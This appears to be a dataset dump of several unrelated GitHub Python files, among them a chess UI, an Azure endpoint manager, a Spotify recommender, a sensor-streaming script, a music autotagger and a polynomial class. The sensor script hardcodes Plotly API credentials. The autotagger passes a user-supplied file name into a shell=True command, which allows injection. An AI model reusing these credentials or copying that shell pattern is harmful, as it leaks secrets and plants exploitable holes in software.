self.ui_promotion_buttons.buttons.append(ImageButton(self.ui_promotion_size, [self.ui_promotion_pos[0], self.ui_promotion_pos[1] +self.ui_promotion_size[1]*piece], self.click_sound, self.board.texture_pack.pieces[self.board.board_data.active][piece]))\n\n \n\n # Ui buttons\n for i in range(0,len(self.ui_promotion_buttons.buttons)):\n self.ui_promotion_buttons.buttons[i].update(self.click_pos)\n if self.ui_promotion_buttons.buttons[i].pressed:\n self.active_players[self.board.board_data.active].tell_type(self.board.board_data, i)\n break;\n \n \n \n \n self.board.draw(self.surface, ((self.board_offset, self.board_offset)), selected, legal_moves)\n self.surface.blit(self.title_surface, self.title_pos)\n \n \n self.ui_promotion_buttons.draws(self.surface)\n self.draw_main_ui()\n\n\n\n\n\n def update(self):\n self.state_to_function[self.state]()\n\n def screen_to_window(self):\n self.win.blit(pygame.transform.scale(\n self.surface, self.win_size), (0, 0))\n\n def start(self):\n while True:\n self.click_pos = [-1,-1]\n self.dt = time.time() - self.last_time\n self.last_time = time.time()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.quit()\n elif event.type == pygame.MOUSEBUTTONUP:\n if event.button == 1:\n self.click_pos = button.convert_window_pos(event.pos, self.win_size, self.surface_size)\n\n self.update()\n self.screen_to_window()\n pygame.display.flip()\n\n def quit(self):\n pygame.quit()\n sys.exit()\n","repo_name":"SleepingNerd/chess","sub_path":"scenemanager.py","file_name":"scenemanager.py","file_ext":"py","file_size_in_byte":14236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"28561197564","text":"__author__ = 'Yifu Huang'\n\nimport sys\n\nsys.path.append(\"..\")\nfrom hackathon.azureformation.utility import (\n find_unassigned_endpoints,\n add_endpoint_to_network_config,\n delete_endpoint_from_network_config,\n)\nfrom hackathon.constants import (\n AZURE_RESOURCE_TYPE,\n AVMStatus,\n)\nfrom hackathon import Component\n\n\nclass Endpoint(Component):\n \"\"\"\n Endpoint is used for dynamic management of azure endpoint on azure cloud service\n \"\"\"\n ERROR_RESULT = None\n TICK = 5\n LOOP = 200\n\n def __init__(self, service):\n self.service = service\n\n def assign_public_endpoints(self, cloud_service_name, deployment_slot, virtual_machine_name, private_endpoints):\n \"\"\"\n Assign public endpoints of cloud service for private endpoints of virtual machine\n Return None if failed\n :param cloud_service_name:\n :param deployment_slot:\n :param virtual_machine_name:\n :param private_endpoints: a list of int or str\n :return: public_endpoints: a list of int\n \"\"\"\n self.log.debug('private_endpoints: %s' % private_endpoints)\n assigned_endpoints = self.service.get_assigned_endpoints(cloud_service_name)\n self.log.debug('assigned_endpoints: %s' % assigned_endpoints)\n if assigned_endpoints is None:\n return self.ERROR_RESULT\n # duplicate detection for public endpoint\n public_endpoints = find_unassigned_endpoints(private_endpoints, assigned_endpoints)\n self.log.debug('public_endpoints: %s' % public_endpoints)\n deployment_name = self.service.get_deployment_name(cloud_service_name, deployment_slot)\n network_config = self.service.get_virtual_machine_network_config(cloud_service_name,\n deployment_name,\n virtual_machine_name)\n # compose new network config to update\n new_network_config = add_endpoint_to_network_config(network_config, public_endpoints, private_endpoints)\n if new_network_config is None:\n return self.ERROR_RESULT\n try:\n result = self.service.update_virtual_machine_network_config(cloud_service_name,\n deployment_name,\n virtual_machine_name,\n new_network_config)\n except Exception as e:\n self.log.error(e)\n return self.ERROR_RESULT\n if not self.service.wait_for_async(result.request_id, self.TICK, self.LOOP):\n self.log.error('wait for async fail')\n return self.ERROR_RESULT\n if not self.service.wait_for_virtual_machine(cloud_service_name,\n deployment_name,\n virtual_machine_name,\n self.TICK,\n self.LOOP,\n AVMStatus.READY_ROLE):\n self.log.error('%s [%s] not ready' % (AZURE_RESOURCE_TYPE.VIRTUAL_MACHINE, virtual_machine_name))\n return self.ERROR_RESULT\n return public_endpoints\n\n def release_public_endpoints(self, cloud_service_name, deployment_slot, virtual_machine_name, private_endpoints):\n \"\"\"\n Release public endpoints of cloud service according to private endpoints of virtual machine\n Return False if failed\n :param cloud_service_name:\n :param deployment_slot:\n :param virtual_machine_name:\n :param private_endpoints: a list of int or str\n :return:\n \"\"\"\n self.log.debug('private_endpoints: %s' % private_endpoints)\n deployment_name = self.service.get_deployment_name(cloud_service_name, deployment_slot)\n network_config = self.service.get_virtual_machine_network_config(cloud_service_name,\n deployment_name,\n virtual_machine_name)\n new_network_config = delete_endpoint_from_network_config(network_config, private_endpoints)\n if new_network_config is None:\n return False\n try:\n result = self.service.update_virtual_machine_network_config(cloud_service_name,\n deployment_name,\n virtual_machine_name,\n new_network_config)\n except Exception as e:\n self.log.error(e)\n return False\n if not self.service.wait_for_async(result.request_id, self.TICK, self.LOOP):\n self.log.error('wait for async fail')\n return False\n if not self.service.wait_for_virtual_machine(cloud_service_name,\n deployment_name,\n virtual_machine_name,\n self.TICK,\n self.LOOP,\n AVMStatus.READY_ROLE):\n self.log.error('%s [%s] not ready' % (AZURE_RESOURCE_TYPE.VIRTUAL_MACHINE, virtual_machine_name))\n return False\n return True","repo_name":"Fendoe/open-hackathon-o","sub_path":"open-hackathon-server/src/hackathon/azureformation/endpoint.py","file_name":"endpoint.py","file_ext":"py","file_size_in_byte":5669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73466292349","text":"''' use of filter function\n\n\ndef is_even(num):\n return num%2 == 0\nnumbers = [1,12,3,53,5,64,64,62,62,646,42,63246,464,634,6464,36,3464]\n\nevens = list(filter(is_even,numbers))\nprint(evens)\n\nvowels = ['a','e','i','o','u']\n\nstrings = ['a','a','s','k','j','d','f','o','a','i','w','e','u','f','k','l','p','e','i','f','j','s','d','k','l','f','j','d','s','k','l','f']\ndef is_vowel(alpha):\n return alpha in vowels\n \n\nresult = list(filter(is_vowel,strings))\n\nprint(result)\n\n'''\n\n\n''' use of lambda function \n\nnumbers = [1,12,3,53,5,64,64,62,62,646,42,63246,464,634,6464,36,3464]\nvowels = ['a','e','i','o','u']\nstrings = ['a','a','s','k','j','d','f','o','a','i','w','e','u','f','k','l','p','e','i','f','j','s','d','k','l','f','j','d','s','k','l','f']\n\n\n\neven_list = list(filter(lambda x:x%2==0, numbers))\nprint(even_list)\n\nvowel_list = list(filter(lambda a:a in vowels, strings))\nprint(vowel_list)\n\n\n\n'''\n\n''' use of map function\n\n\n# def is_onemore(num):\n# return num + 1\n\nnumbers = [1,2,3,4,55,6,6,545,2,532,252,56,62,6,7,8,6,4,3,2,4,56,7,9]\n\nplus_one = list(map(lambda x: x + 1,numbers))\nprint(plus_one)\n\n'''\n\n''' use of reduce function in adding more than 2 numbers\n'''\n#we have to import reduce from functools\nfrom functools import reduce\n\n# def add_all(a,b):\n# return a+b\nnumbers = [1,2,3,4,55,6,6,545,2,532,252,56,62,6,7,8,6,4,3,2,4,56,7,9]\n\nfinal = reduce(lambda a,b: a+b,numbers)\nprint(final)\n\n\n\n\n\n\n","repo_name":"asishraz/python_learning","sub_path":"filter_function.py","file_name":"filter_function.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5057796006","text":"from datetime import date\n\nimport pytest\n\nfrom .testapp.models import Book\n\n\n@pytest.mark.django_db\ndef test_save_cycle():\n Book.objects.create(data={'title': 'The Lord of the Rings', 'author': 'Tolkien'})\n b = Book.objects.first()\n b.clean()\n assert b.data['title'] == 'The Lord of the Rings'\n\n\n@pytest.mark.django_db\ndef test_custom_encoder():\n Book.objects.create(data={'title': 'The Lord of the Rings', 'date': date(1954, 7, 29)})\n b = Book.objects.first()\n b.clean()\n assert b.data['date'] == '1954-07-29'\n\n\n@pytest.mark.django_db\ndef test_default():\n Book.objects.create()\n b = Book.objects.first()\n b.clean()\n assert b.data['foo'] == 'bar'\n\n\n\"\"\"\n@pytest.mark.django_db\ndef test_nullable():\n Book.objects.create(data=None)\n b = Book.objects.first()\n b.clean()\n assert b.data is None\n\"\"\"\n","repo_name":"raphaelm/django-jsonfallback","sub_path":"tests/test_serialization.py","file_name":"test_serialization.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"6"} +{"seq_id":"74195823548","text":"from abc import ABC, abstractmethod\nimport pandas as pd\nfrom sklearn import preprocessing\nfrom sklearn.svm import SVC\n\n\nclass Recommender(ABC):\n def __init__(self, playlist_tracks, recommendations_pool):\n\n self.playlist_tracks = playlist_tracks\n self.disliked_tracks = []\n self.recommendations_pool = recommendations_pool\n self.current_recommendation = self.next()\n\n def like(self):\n self.next(True)\n\n def dislike(self):\n self.next(False)\n\n def current(self):\n return self.current_recommendation\n\n def next(self, like_current_recommendation=None):\n if like_current_recommendation:\n self.playlist_tracks.append(self.current_recommendation)\n if like_current_recommendation is False:\n self.disliked_tracks.append(self.current_recommendation)\n\n if self.recommendations_pool:\n self.current_recommendation = self.next_recommendation(\n like_current_recommendation)\n else:\n self.current_recommendation = None\n\n return self.current_recommendation\n\n @abstractmethod\n def next_recommendation():\n pass\n\n\nclass BaselineRecommender(Recommender):\n def next_recommendation(self, like_current_recommendation):\n return self.recommendations_pool.pop()\n\n\n# All songs in the playlist have target feature = True\n# All songs in the recommendation pool have target feature = False\n# Train classifier based on that.\nclass NaivePUClassifier(Recommender):\n def next_recommendation(self, like_current_recommendation):\n X_train = preprocessing.scale(\n pd.DataFrame(\n list([\n x['features']\n for x in (self.playlist_tracks + self.disliked_tracks +\n self.recommendations_pool)\n ])))\n\n X_predict = preprocessing.scale(\n pd.DataFrame(\n list([x['features'] for x in self.recommendations_pool])))\n\n y = pd.Series([True] * len(self.playlist_tracks) +\n [False] * len(self.disliked_tracks) +\n [False] * len(self.recommendations_pool))\n\n clf = SVC(gamma='auto', probability=True)\n clf.fit(X_train, y)\n predictions = clf.predict_proba(X_predict)[:, 1]\n\n recommendation_index = predictions.argmax()\n return self.recommendations_pool.pop(recommendation_index)\n\n\ndef initialize_recommender(playlist_tracks, recommendations_pool):\n global recommender\n recommender = NaivePUClassifier(playlist_tracks, recommendations_pool)\n\n\ndef get_recommendation():\n global recommender\n return recommender.current()\n\n\ndef like_recommendation():\n global recommender\n return recommender.like()\n\n\ndef dislike_recommendation():\n global recommender\n return recommender.dislike()\n","repo_name":"castdin/spotify-playlist-maker","sub_path":"server/recommender.py","file_name":"recommender.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26794825211","text":"import time\nimport board\nimport busio\nimport adafruit_adxl34x\nimport numpy\nimport smbus\nimport datetime\n\nimport plotly.plotly as py# plotly library\nfrom plotly.graph_objs import Scatter, Layout, Figure # plotly graph objects\n\nusername = 'messay'\napi_key = 'aGWxBNUA1wgFnC8xkY66'\nstream_token = '8g0wx06s37'\n\npy.sign_in(username, api_key)\n\ntrace1 = Scatter(\n x=[],\n y=[],\n stream=dict(\n token=stream_token,\n maxpoints=200\n )\n)\n\n\n\nlayout = Layout(\n title='Raspberry Pi Streaming Sensor Data'\n)\n\nfig = Figure(data=[trace1], layout=layout)\n\nprint (py.plot(fig, filename='Raspberry Pi Streaming Example Values'))\n\nstream = py.Stream(stream_token)\nstream.open()\n\n\ni2c = busio.I2C(board.SCL, board.SDA)\nbus = smbus.SMBus(1)\n \n# For ADXL343\n#accelerometer = adafruit_adxl34x.ADXL343(i2c)\n# For ADXL345\naccelerometer = adafruit_adxl34x.ADXL345(i2c)\n \nwhile True:\n bus.write_byte_data(0x60, 0x26, 0x39)\n time.sleep(1)\n # MPL3115A2 address, 0x60(96)\n # Read data back from 0x00(00), 4 bytes\n # status, pres MSB1, pres MSB, pres LSB\n data = bus.read_i2c_block_data(0x60, 0x00, 4)\n # Convert the data to 20-bits\n pres = ((data[1] * 65536) + (data[2] * 256) + (data[3] & 0xF0)) / 16\n pressure = (pres / 4.0) / 1000.0\n # Output data to screen\n print (\"Pressure : %.2f kPa\" %pressure)\n \n #print(\"%f %f %f\" % accelerometer.acceleration)\n accelerometer_raw=accelerometer.acceleration\n accelerometer_magnitude=numpy.sqrt(numpy.square(accelerometer_raw[0])+numpy.square(accelerometer_raw[1])+numpy.square(accelerometer_raw[2]))\n print(\"Acceleration : %f\" %accelerometer_magnitude)\n #time.sleep(0.1)\n \n \n \n stream.write({'x': datetime.datetime.now(), 'y': accelerometer_magnitude})\n \n \n time.sleep(0.25) # delay between stream posts\n","repo_name":"tunchunairarko/canaryplay","sub_path":"accelerometer.py","file_name":"accelerometer.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72054413949","text":"import logging\n\nimport cv2\nimport numpy as np\nfrom skimage.measure import compare_ssim, compare_mse, compare_nrmse, compare_psnr\nfrom sklearn.preprocessing import MinMaxScaler\n\n\ndef image_similarity_measures(image_a, image_b):\n logger = logging.getLogger(__name__)\n\n result = {}\n\n # Align image_a to image_b\n # image_a, homography = img_registration(image_a, image_b)\n\n functions = [compare_mse, compare_nrmse, compare_psnr, compare_ssim]\n difference_image = None\n\n for function in functions:\n logger.info('Executing {}'.format(function.__name__))\n\n if function.__name__ == 'compare_ssim':\n try:\n gray_a = cv2.cvtColor(image_a, cv2.COLOR_BGR2GRAY)\n gray_b = cv2.cvtColor(image_b, cv2.COLOR_BGR2GRAY)\n # This should not be caught with an exception :), tif scaling\n except cv2.error:\n scaler = MinMaxScaler(copy=False, feature_range=(0, 255))\n gray_a = scaler.fit_transform(image_a)\n gray_b = scaler.fit_transform(image_b)\n\n score, difference_image = function(gray_a, gray_b, full=True)\n if score != 1.0:\n difference_image = (difference_image * 255).astype(\"uint8\")\n if score == np.nan:\n score == 'NaN'\n result[function.__name__] = score\n else:\n score = function(image_a, image_b)\n if score == float(\"inf\"):\n score = \"infinity\"\n result[function.__name__] = score\n\n return result, difference_image\n\n\ndef img_registration(image_a, image_b):\n # https://www.learnopencv.com/image-alignment-feature-based-using-opencv-c-python/\n # Convert images to grayscale\n im1Gray = cv2.cvtColor(image_a, cv2.COLOR_BGR2GRAY)\n im2Gray = cv2.cvtColor(image_b, cv2.COLOR_BGR2GRAY)\n\n # Detect ORB features and compute descriptors.\n orb = cv2.ORB_create(500)\n keypoints1, descriptors1 = orb.detectAndCompute(im1Gray, None)\n keypoints2, descriptors2 = orb.detectAndCompute(im2Gray, None)\n\n # Match features.\n matcher = cv2.DescriptorMatcher_create(cv2.DESCRIPTOR_MATCHER_BRUTEFORCE_HAMMING)\n matches = matcher.match(descriptors1, descriptors2, None)\n\n # Sort matches by score\n matches.sort(key=lambda x: x.distance, reverse=False)\n\n # Remove not so good matches\n numGoodMatches = int(len(matches) * 0.25)\n matches = matches[:numGoodMatches]\n\n # Draw top matches\n #imMatches = cv2.drawMatches(image_a, keypoints1, image_b, keypoints2, matches, None)\n #cv2.imwrite(\"matches.jpg\", imMatches)\n\n # Extract location of good matches\n points1 = np.zeros((len(matches), 2), dtype=np.float32)\n points2 = np.zeros((len(matches), 2), dtype=np.float32)\n\n for i, match in enumerate(matches):\n points1[i, :] = keypoints1[match.queryIdx].pt\n points2[i, :] = keypoints2[match.trainIdx].pt\n\n # Find homography\n h, _ = cv2.findHomography(points1, points2, cv2.RANSAC)\n # Use homography\n height, width, _ = image_b.shape\n imbReg = cv2.warpPerspective(image_a, h, (width, height))\n return imbReg, h\n","repo_name":"Open-EO/openeo-result-validation-engine","sub_path":"RuleEngine/Algorithms/image_funcs.py","file_name":"image_funcs.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"13951178040","text":"#!/usr/bin/python2.7\n\n# Things this program should do\n# use proper metadata (acoustid + musicbrainz)\n# add in album art (guess from file names?)\n# move, rename cue and log files\n# remove .m3u file, album dir if necessary\n# custom music directory\n\nimport acoustid\nimport argparse\nimport glob\nimport mimetypes\n#import musicbrainzngs as mb\nfrom mutagen import File\nimport re\nimport subprocess\nimport sys\n\nimport pprint\n\n''''\ncues = glob.glob(\"./*.cue\") #CUE and log files should also be moved\nlogs = glob.glob(\"./*.log\")\n'''\n\nargs = {\"rename\": False, \"move\": False, \"albumart\": False,\n \"descriptionfile\": \"info.txt\", \"normalize\": False }\n\ndef sanitize_name(name):\n \"\"\"Rename something to something more sensible.\"\"\"\n return re.sub(\"[!@#$%^&*()~`]\", \"\", name).lower().replace(\" \", \"_\")\n\ndef convert_process_flacs(mask=\"*.flac\"):\n \"\"\"Convert all files matching mask to flac and process at once.\n mask - the string that matches the files (default: *.flac)\"\"\"\n global args\n if args[\"normalize\"]:\n print(subprocess.check_output(\"flac -V8f --replay-gain \" + mask,\n shell = True))\n try:\n subprocess.check_output(\"metaflac --set-tag-from-file=DESCRIPTION=\" +\n args[\"descriptionfile\"] + \" *.flac\", shell = True)\n except subprocess.CalledProcessError:\n pass #no big deal\n\ndef ranged_input(min, max):\n input = raw_input()\n while input > max or input < min:\n print(\"Input error: must be between \" + str(min) + \" and \" + str(max)\n + \" inclusive\")\n input = int(raw_input())\n return input\n\ndef get_cover_and_code(albums, img): #this is not so bad atm\n codes = [\"Other\", \"32x32 pixels 'file icon' (PNG only)\", \"Other file icon\",\n \"Cover (front)\", \"Cover (back)\", \"Leaflet page\",\n \"Media (e.g. label side of CD)\", \"Lead artist/lead performer/soloist\",\n \"Artist/performer\", \"Conductor\", \"Band/Orchestra\", \"Composer\",\n \"Lyricist/text writer\", \"Recording Location\", \"During recording\",\n \"During performance\", \"Movie/video screen capture\",\n \"A bright coloured fish\", \"Illustration\", \"Band/artist logotype\",\n \"Publisher/Studio logotype\"]\n for index, item in enumerate(albums):\n print(str(index) + \": \" + item)\n print(\"Enter number of album with cover {0} (-1 for none):\".format(img))\n album = ranged_input(-1, albums - 1)\n if(cover > -1):\n for index, item in enumerate(codes):\n print(str(index) + \": \" + item)\n print(\"Enter description code: \")\n code = ranged_input(0, len(codes) - 1)\n return [album, code]\n\ndef add_art(imgcode, img, albums):\n \"\"\"Associate img with the tracks associated with that album as shown by\n albums according to the rules in imgcode.\"\"\"\n \n\ndef process():\n \"\"\"Process all tracks in the current directory.\"\"\"\n global args\n \n tracks = glob.glob(\"./*.flac\") #All compatible audio files\n tracks.extend(glob.glob(\"./*.mp3\"))\n tracks.extend(glob.glob(\"./*.ogg\"))\n tracks.extend(glob.glob(\"./*.wav\"))\n albums = {}\n\n flacs_normalized = False;\n wavs_normalized = False;\n oggs_normalized = False;\n\n if False:\n mb.set_useragent(\"Autotagger\", \".1\", \"plasmasheep@gmail.com\")\n \n if(len(tracks) == 0):\n print(\"No compatible audio files found. Please use flac, mp3, or ogg.\")\n sys.exit()\n \n for track in tracks:\n print(\"Processing: \" + track)\n audio = File(track, easy=True)\n filetype = mimetypes.guess_type(track)[0]\n suffix = mimetypes.guess_extension(filetype)\n try:\n if audio[\"album\"][0] not in albums:\n albums[audio[\"album\"][0]] = []\n print(\"Detected new album: \" + audio[\"album\"][0])\n albums[audio[\"album\"][0]].append(track)\n except KeyError:\n print(\"This file has no album.\")\n \n if suffix == \".flac\":\n print(\"FLAC file detected\")\n if flacs_normalized is False:\n print(\"Processing all FLAC files...\")\n convert_process_flacs()\n flacs_normalized = True;\n else:\n print(\"FLACs already processed\")\n \n if suffix == \".ogg\":\n print(\"OGG file detected\")\n if oggs_normalized is False:\n print(\"Processing all OGG files...\")\n print(subprocess.check_output(\"vorbisgain -a *.ogg\",\n shell = True))\n oggs_normalized = True\n else:\n print(\"OGGs already processed\")\n\n if suffix == \".wav\":\n print(\"WAV file detected\")\n if wavs_normalized is False:\n print(\"Processing all WAV files...\")\n convert_process_flacs(\"*.wav\")\n wavs_normalized = True\n else:\n print(\"WAVs already processed\")\n #WAV files will become flac files, update track accordingly\n track = track[:-4] + \".flac\"\n \n if suffix == \".mp3\":\n print(\"MP3 file detected\")\n if args[\"normalize\"]: #TODO: this does not handle album norm\n print(subprocess.check_output([\"lame\", \"--replaygain-accurate\",\n track]))\n subprocess.call([\"mv\", track + \".mp3\", track])\n #print subprocess.check_output([\"id3v2\", \"-C\", track])\n #print subprocess.check_output([\"id3v2\", \"--delete-v1\", track])\n\n '''if grabmeta:\n fingerprint = acoustid.fingerprint_file(track)\n result = acoustid.lookup(\"ZKTsCHXl\", fingerprint[1], fingerprint[0])\n look = mb.get_release_by_id(result[\"results\"][0][\"recordings\"][0][\"id\"])'''\n\n if args[\"rename\"]:\n try:\n newname = '{:0>2}'.format(audio[\"tracknumber\"][0]) + \"-\" + \\\n sanitize_name(audio[\"title\"][0])\n print(subprocess.check_output(['mv', \"-v\", track,\n newname + suffix]))\n track = newname + suffix\n except TypeError:\n print(\"No metadata readable, cannot rename with track info.\")\n print(subprocess.check_output([\"mv\", \"-v\", track,\n sanitize_name(track)]))\n track = sanitize_name(track)\n \n if args[\"move\"]:\n try:\n newdir = \"/home/user/music/\" + \\\n sanitize_name(audio[\"artist\"][0]) + \"/\" + \\\n sanitize_name(audio[\"album\"][0]) + \"/\"\n subprocess.call([\"mkdir\", \"-p\", newdir])\n print(subprocess.check_output(['mv', \"-v\", track,\n newdir + track]))\n except TypeError:\n print(\"No metadata readable, cannot move.\")\n\n print(\"\")\n\n if args[\"albumart\"]:\n pics = glob.glob(\"./*.png\") #Image files\n pics.extend(glob.glob(\"./*.jpg\"))\n pics.extend(glob.glob(\"./*.jpeg\"))\n pics.extend(glob.glob(\"./*.gif\"))\n print(str(len(pics)) + \" images found.\")\n if(len(pics) > 0):\n #Convert albums into a more useful format:\n #{\"album1\":[\"track1\", \"track2\"], \"album2\":[\"track3\"]} --->\n #[{\"album1\":[\"track1\", \"track2\"]}, {\"album2\":[\"track3\"]}]\n #We can access albums by numbers this way\n albumlist = []\n for album, tracks in albums.iteritems():\n albumlist.append({album: tracks})\n for pic in pics:\n #For each pic, associate with an album, associate with a type,\n #then tag all files with that album\n print(\"Image: \" + pic)\n arts = get_cover_and_code(albumlist, pic)\n add_album_art(arts, pic, albums)\n \n else:\n print(\"No images found, cannot add album art.\") #TODO: online art\n \ndef main(argv): #Maybe make this take a list of files?\n global args\n parser = argparse.ArgumentParser(\n description = \"Import files in the current directory.\")\n parser.add_argument(\"-r\", \"--rename\", action=\"store_true\",\n help=\"Rename the files.\")\n parser.add_argument(\"-m\", \"--move\", action=\"store_true\",\n help=\"Move the files to the music directory.\")\n parser.add_argument(\"-a\", \"--albumart\", action=\"store_true\",\n help=\"Set album art as metadata.\")\n parser.add_argument(\"-n\", \"--normalize\", action=\"store_true\",\n help=\"Normalize tracks with ReplayGain.\")\n parser.add_argument(\"-d\", \"--descriptionfile\", action=\"store\",\n default=\"info.txt\", help=\"Which file to use for the DESCRIPTION tag.\")\n args = vars(parser.parse_args(argv))\n process()\n\nif(__name__ == \"__main__\"):\n main(sys.argv[1:])","repo_name":"abendebury/soundboy","sub_path":"autotag.py","file_name":"autotag.py","file_ext":"py","file_size_in_byte":8748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"41058257046","text":"class Poly:\r\n \r\n def __init__(self,*terms):\r\n # __str__ uses the name self.terms for the dictionary of terms\r\n # So __init__ should build this dictionary from terms\r\n self.terms = {}\r\n \r\n # Fill in the rest of this method, using *terms to intialize self.terms\r\n for x in terms:\r\n assert type(x[0]) is float or type(x[0]) is int, (\"Poly.__init__: illegal coefficient in\" + str(x) + \".\")\r\n assert type(x[1]) is int and x[1] >= 0, (\"Poly.__init__: illegal power in: \" + str(x) + \".\") \r\n assert x[1] not in self.terms, \"Poly.__init__: power {} is repeated.\".format(x[1])\r\n if x[0] != 0:\r\n self.terms[x[1]] = x[0]\r\n \r\n # I have written str(...) because it is used in the bsc.txt file and\r\n # it is a bit subtle to get correct. Notice that it assumes that\r\n # every Poly object stores a dict whose keys are powers and whose\r\n # associated values are coefficients. This function does not depend\r\n # on any other method in this class being written correctly. \r\n def __str__(self):\r\n def term(c,p,var):\r\n return (str(c) if p == 0 or c != 1 else '') +\\\r\n ('' if p == 0 else var+('^'+str(p) if p != 1 else ''))\r\n if len(self.terms) == 0:\r\n return '0'\r\n else:\r\n return ' + '.join([term(c,p,'x') for p,c in sorted(self.terms.items(),reverse=True)]).replace('+ -','- ')\r\n \r\n def __repr__(self):\r\n return \"Poly(\" + \",\".join([str((x[1], x[0])) for x in self.terms.items()]) + \")\"\r\n\r\n \r\n def __len__(self):\r\n if self.terms == {}:\r\n return 0\r\n return max([x for x in self.terms])\r\n \r\n \r\n def __call__(self,arg):\r\n assert type(arg) is int or type(arg) is float, (\"Poly.__init__: illegal arg:\", arg)\r\n result = 0\r\n for k in self.terms:\r\n result += arg ** k * self.terms[k]\r\n return result\r\n \r\n\r\n def __iter__(self):\r\n for k in sorted(self.terms, reverse=True):\r\n yield (self.terms[k], k)\r\n \r\n\r\n def __getitem__(self,index):\r\n self._checkIndexLegality(index, \"__getitem__\")\r\n if index not in self.terms:\r\n return 0\r\n return self.terms[index]\r\n \r\n\r\n def __setitem__(self,index,value):\r\n self._checkIndexLegality(index, \"__setitem__\")\r\n if value == 0 and index in self.terms:\r\n del self.terms[index]\r\n elif value != 0:\r\n self.terms[index] = value\r\n \r\n\r\n def __delitem__(self,index):\r\n self._checkIndexLegality(index, \"__delitem__\")\r\n if index in self.terms:\r\n del self.terms[index]\r\n \r\n def _checkIndexLegality(self, index, functionName):\r\n if index < 0 or type(index) is not int:\r\n raise TypeError(\"Poly.\" + functionName+\": illegal index \" + str(index))\r\n \r\n\r\n def _add_term(self,c,p):\r\n if type(c) is not int and type(c) is not float:\r\n raise TypeError(\"Poly._add_term: illegal coefficient\", c)\r\n if type(p) is not int or p < 0:\r\n raise TypeError(\"Poly._add_term: illegal power\", p)\r\n if p not in self.terms and c != 0:\r\n self.terms[p] = c\r\n elif p in self.terms:\r\n self.terms[p] += c\r\n if p in self.terms and self.terms[p] == 0:\r\n del self.terms[p]\r\n \r\n\r\n def __add__(self,right):\r\n self._checkArithmeticCompatibility(right, \"__add__\")\r\n return self._add_into_self(right)\r\n\r\n \r\n def __radd__(self,left):\r\n self._checkArithmeticCompatibility(left, \"__radd__\")\r\n return self._add_into_self(left)\r\n \r\n\r\n def __mul__(self,right):\r\n self._checkArithmeticCompatibility(right, \"__mul__\")\r\n return self._mul_into_self(right)\r\n\r\n def __rmul__(self,left):\r\n self._checkArithmeticCompatibility(left, \"__rmul__\")\r\n return self._mul_into_self(left)\r\n \r\n def _mul_into_self(self, term):\r\n result = Poly()\r\n if type(term) is Poly:\r\n for x in self.terms.items():\r\n for y in term.terms.items():\r\n result._add_term(x[1] * y[1], x[0] + y[0])\r\n else:\r\n for x in self.terms.items():\r\n result._add_term(term * x[1], x[0])\r\n return result\r\n \r\n \r\n def _add_into_self(self, term):\r\n result = Poly(*[(x[1], x[0]) for x in self.terms.items()])\r\n if type(term) is Poly:\r\n for x in term:\r\n result._add_term(x[0], x[1])\r\n else:\r\n result._add_term(term, 0)\r\n return result\r\n \r\n def _checkArithmeticCompatibility(self, operand, functionName):\r\n if type(operand) is not int and type(operand) is not float and type(operand) is not Poly:\r\n raise TypeError(\"Poly.\" + functionName + \": illegl operand: \" + str(operand))\r\n\r\n def __eq__(self,right):\r\n self._checkArithmeticCompatibility(right, \"__eq__\")\r\n if type(right) is Poly:\r\n for x in right:\r\n if x[1] not in self.terms or self.terms[x[1]] != x[0]:\r\n return False\r\n return True\r\n return self.terms[0] == right\r\n\r\n \r\nif __name__ == '__main__':\r\n # Some simple tests; you can comment them out and/or add your own before\r\n # the driver is called.\r\n print('Start simple tests')\r\n p = Poly((3,2),(-2,1), (4,0))\r\n print(' For Polynomial: 3x^2 - 2x + 4')\r\n print(' str(p):',p)\r\n print(' repr(p):',repr(p))\r\n print(' len(p):',len(p))\r\n print(' p(2):',p(2))\r\n print(' list collecting iterator results:',[t for t in p])\r\n print(' p+p:',p+p)\r\n print(' p+2:',p+2)\r\n print(' p*p:',p*p)\r\n print(' p*2:',p*2)\r\n print('End simple tests\\n')\r\n \r\n import driver\r\n #driver.default_show_exception=True\r\n #driver.default_show_exception_message=True\r\n #driver.default_show_traceback=True\r\n driver.driver()","repo_name":"solomc1/python","sub_path":"ics 33/solutions/ile2 solutions/Lab 2/LongNicholas/poly.py","file_name":"poly.py","file_ext":"py","file_size_in_byte":6051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"19932699768","text":"import argparse\nimport logging\nimport os\nfrom contextlib import contextmanager\nfrom itertools import cycle, islice\n\n\ndef _positive_int(value):\n \"\"\"Expect a command line argument to be a positive integer.\n\n Designed to be used in conjunction with an argparse.ArgumentParser.\n\n :param value:\n This function will raise an argparse.ArgumentTypeError if value\n is not a positive integer.\n :raises:\n :class:`argparse.ArgumentTypeError`\n \"\"\"\n try:\n ivalue = int(value)\n if ivalue <= 0:\n raise argparse.ArgumentTypeError(\"Value must be positive.\")\n except (TypeError, ValueError):\n raise argparse.ArgumentTypeError(f\"{value} must be a positive integer.\")\n return ivalue\n\n\n@contextmanager\ndef redirect_log(job, filename=\"run.log\", formatter=None, logger=None):\n \"\"\"Redirect all messages logged via the logging interface to the given file.\n\n :param job:\n An instance of a signac job.\n :type job:\n :class:`signac.Project.Job`\n :formatter:\n The logging formatter to use, uses a default formatter if this argument\n is not provided.\n :type formatter:\n :class:`logging.Formatter`\n :param logger:\n The instance of logger to which the new file log handler is added. Defaults\n to the default logger returned by `logging.getLogger()` if this argument is\n not provided.\n :type logger:\n :class:`logging.Logger`\n \"\"\"\n if formatter is None:\n formatter = 